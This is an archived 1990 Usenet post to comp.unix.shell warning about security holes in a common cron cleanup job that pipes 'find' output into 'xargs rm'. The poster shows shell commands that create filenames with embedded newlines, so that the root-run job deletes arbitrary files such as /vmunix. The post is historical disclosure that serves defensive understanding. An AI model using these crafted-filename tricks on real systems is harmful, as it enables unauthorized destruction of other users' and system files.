Beware xargs security holes
Paul John Falstad
pfalstad at stone.Princeton.EDU
Wed Oct 17 05:12:06 AEST 1990
In article <13569:Oct1617:00:0590 at kramden.acf.nyu.edu> brnstnd at kramden.acf.nyu.edu (Dan Bernstein) writes:
>In article <3876 at awdprime.UUCP> tif at doorstop.austin.ibm.com (Paul Chamberlain) writes:
>> In article <4062:Oct1518:22:1290 at kramden.acf.nyu.edu> brnstnd at kramden.acf.nyu.edu (Dan Bernstein) writes:
>> > find / -name '#*' -atime +7 -print | xargs rm
>> The most malicious thing I can do with the above command is
>> remove a file that doesn't start with '#' that's in a
>> writable directory.
>Incorrect. If that command is run daily from cron, as it is on many
>systems, then any user can remove any file on the system.
Oh, I see. You could do something like this:
$ echo >'#
vmunix'
And then cron would delete /vmunix. That's assuming cron starts up xargs
with / as its current directory.
And to delete other files (not necessarily in /), you could do:
$ mkdir '#
'
$ cd '#
'
$ mkdir u; mkdir u/subbarao
$ mkdir u/subbarao/.plan'
'
$ date >u/subbarao/.plan'
/#foo'
If you do a find . -name '#*' -print | xargs echo in this directory, you get:
./# ./# /u/subbarao/.plan /#foo ./# vmunix
Very nasty. Wonder if it works on my system...
--
Paul Falstad, pfalstad at phoenix.princeton.edu PLink:HYPNOS GEnie:P.FALSTAD
"And she's always on about men following her. I don't know what she
thinks they're going to do to her. Vomit on her, Basil, says."-Flowery Twats
More information about the Comp.unix.shell
mailing list